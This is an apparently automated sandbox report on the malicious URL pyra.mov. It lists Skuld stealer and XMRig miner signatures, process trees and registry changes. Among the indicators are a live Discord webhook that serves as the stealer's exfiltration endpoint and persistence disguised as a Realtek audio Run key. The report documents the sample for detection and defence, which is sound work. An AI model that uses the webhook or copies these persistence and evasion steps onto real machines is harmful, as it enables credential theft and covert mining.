skuld | hxxp://pyra[.]mov

Analysis

max time kernel
132s
max time network
114s
platform
windows10-ltsc_2021_x64
resource
win10ltsc2021-20250314-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system
submitted
06/04/2025, 03:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://pyra.mov

Score

10^/10

skuld xmrig defense_evasion discovery execution miner persistence stealer upx

Malware Config

Extracted

Family

skuld

https://discord.com/api/webhooks/1357468186764775586/BRP230l-SHvQfTpsLO5GgfFtW8ZwDogt43OWww-lXchxPOAw7f7pT6n98q0MMIyhGHyc

Signatures

Skuld family
skuld
Skuld stealer
An info stealer written in Go lang.
stealer skuld
Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral1/memory/2004-214-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2004-218-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2004-219-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2004-220-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2004-217-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2004-216-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2004-213-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2004-262-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/2004-263-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

pid	Process
2824	powershell.exe
4116	powershell.exe
4388	powershell.exe
60	powershell.exe
1456	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 2 IoCs

flow	pid	Process
66	780	curl.exe
59	3816	curl.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 5 IoCs

pid	Process
2064	Pyra.exe
2544	file1.exe
3452	file2.exe
4456	SecurityHealthSystray.exe
2112	iixpziuhlnum.exe

Modifies file permissions 1 TTPs 26 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4652	icacls.exe
2696	icacls.exe
564	icacls.exe
3236	icacls.exe
392	icacls.exe
4132	icacls.exe
4452	icacls.exe
2484	icacls.exe
4400	icacls.exe
1252	icacls.exe
2004	icacls.exe
3788	icacls.exe
1428	icacls.exe
1552	icacls.exe
1600	icacls.exe
1528	icacls.exe
3192	icacls.exe
4304	icacls.exe
3540	icacls.exe
2060	icacls.exe
3648	icacls.exe
1188	icacls.exe
2564	icacls.exe
2096	icacls.exe
1808	icacls.exe
4216	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2543098825-609255811-1615676193-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	file2.exe

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2096	powercfg.exe
2828	powercfg.exe
3452	powercfg.exe
1600	powercfg.exe
1676	powercfg.exe
1600	powercfg.exe
952	powercfg.exe
4728	powercfg.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	iixpziuhlnum.exe
File opened for modification	C:\Windows\system32\MRT.exe	file1.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2112 set thread context of 4564	2112	iixpziuhlnum.exe	211
PID 2112 set thread context of 2004	2112	iixpziuhlnum.exe	216

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2004-209-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2004-212-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2004-214-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2004-218-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2004-219-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2004-220-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2004-217-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2004-216-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2004-213-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2004-211-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2004-208-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2004-210-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2004-262-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2004-263-0x0000000140000000-0x0000000140835000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3192	sc.exe
2404	sc.exe
2688	sc.exe
4496	sc.exe
4872	sc.exe
4216	sc.exe
5076	sc.exe
3540	sc.exe
4116	sc.exe
5008	sc.exe
2052	sc.exe
648	sc.exe
4288	sc.exe
660	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
1656	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 48 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133883853679136126"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2543098825-609255811-1615676193-1000_Classes\Local Settings	chrome.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
220	chrome.exe
220	chrome.exe
1456	powershell.exe
1456	powershell.exe
1456	powershell.exe
2824	powershell.exe
2824	powershell.exe
2824	powershell.exe
4116	powershell.exe
4116	powershell.exe
4116	powershell.exe
2544	file1.exe
4388	powershell.exe
4388	powershell.exe
4388	powershell.exe
2544	file1.exe
2544	file1.exe
2544	file1.exe
2544	file1.exe
2544	file1.exe
2544	file1.exe
2544	file1.exe
2544	file1.exe
2544	file1.exe
2544	file1.exe
2544	file1.exe
2544	file1.exe
2544	file1.exe
2544	file1.exe
2112	iixpziuhlnum.exe
60	powershell.exe
60	powershell.exe
60	powershell.exe
2112	iixpziuhlnum.exe
2112	iixpziuhlnum.exe
2112	iixpziuhlnum.exe
2112	iixpziuhlnum.exe
2112	iixpziuhlnum.exe
2112	iixpziuhlnum.exe
220	chrome.exe
220	chrome.exe
2112	iixpziuhlnum.exe
2112	iixpziuhlnum.exe
2112	iixpziuhlnum.exe
2112	iixpziuhlnum.exe
2112	iixpziuhlnum.exe
2112	iixpziuhlnum.exe
2004	explorer.exe
2004	explorer.exe
2004	explorer.exe
2004	explorer.exe
2004	explorer.exe
2004	explorer.exe
2004	explorer.exe
2004	explorer.exe
2004	explorer.exe
2004	explorer.exe
2004	explorer.exe
2004	explorer.exe
2004	explorer.exe
2004	explorer.exe
2004	explorer.exe
2004	explorer.exe
2004	explorer.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeRestorePrivilege	4944	7zG.exe
Token: 35	4944	7zG.exe
Token: SeSecurityPrivilege	4944	7zG.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeSecurityPrivilege	4944	7zG.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe
Token: SeShutdownPrivilege	220	chrome.exe
Token: SeCreatePagefilePrivilege	220	chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
4944	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe
220	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 220 wrote to memory of 876	220	chrome.exe	82
PID 220 wrote to memory of 876	220	chrome.exe	82
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 4092	220	chrome.exe	83
PID 220 wrote to memory of 3692	220	chrome.exe	84
PID 220 wrote to memory of 3692	220	chrome.exe	84
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85
PID 220 wrote to memory of 756	220	chrome.exe	85

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1676	attrib.exe
2896	attrib.exe

cURL User-Agent 2 IoCs

Uses User-Agent string associated with cURL utility.

description	flow	ioc
HTTP User-Agent header	59	curl/8.7.1
HTTP User-Agent header	66	curl/8.7.1

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://pyra.mov
1⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff88112dcf8,0x7ff88112dd04,0x7ff88112dd10
  2⤵
  PID:876
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1984,i,15947584402579154475,1959768805475668732,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1980 /prefetch:2
  2⤵
  PID:4092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2216,i,15947584402579154475,1959768805475668732,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2224 /prefetch:3
  2⤵
  PID:3692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2376,i,15947584402579154475,1959768805475668732,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2388 /prefetch:8
  2⤵
  PID:756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3064,i,15947584402579154475,1959768805475668732,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3208 /prefetch:1
  2⤵
  PID:3916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3068,i,15947584402579154475,1959768805475668732,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3228 /prefetch:1
  2⤵
  PID:1032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4396,i,15947584402579154475,1959768805475668732,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4416 /prefetch:2
  2⤵
  PID:2096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4680,i,15947584402579154475,1959768805475668732,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4716 /prefetch:1
  2⤵
  PID:2648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4868,i,15947584402579154475,1959768805475668732,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4876 /prefetch:1
  2⤵
  PID:3628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5216,i,15947584402579154475,1959768805475668732,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5228 /prefetch:8
  2⤵
  PID:1696
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5500,i,15947584402579154475,1959768805475668732,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5704 /prefetch:8
  2⤵
  PID:3260
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=500,i,15947584402579154475,1959768805475668732,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5228 /prefetch:8
  2⤵
  PID:1600
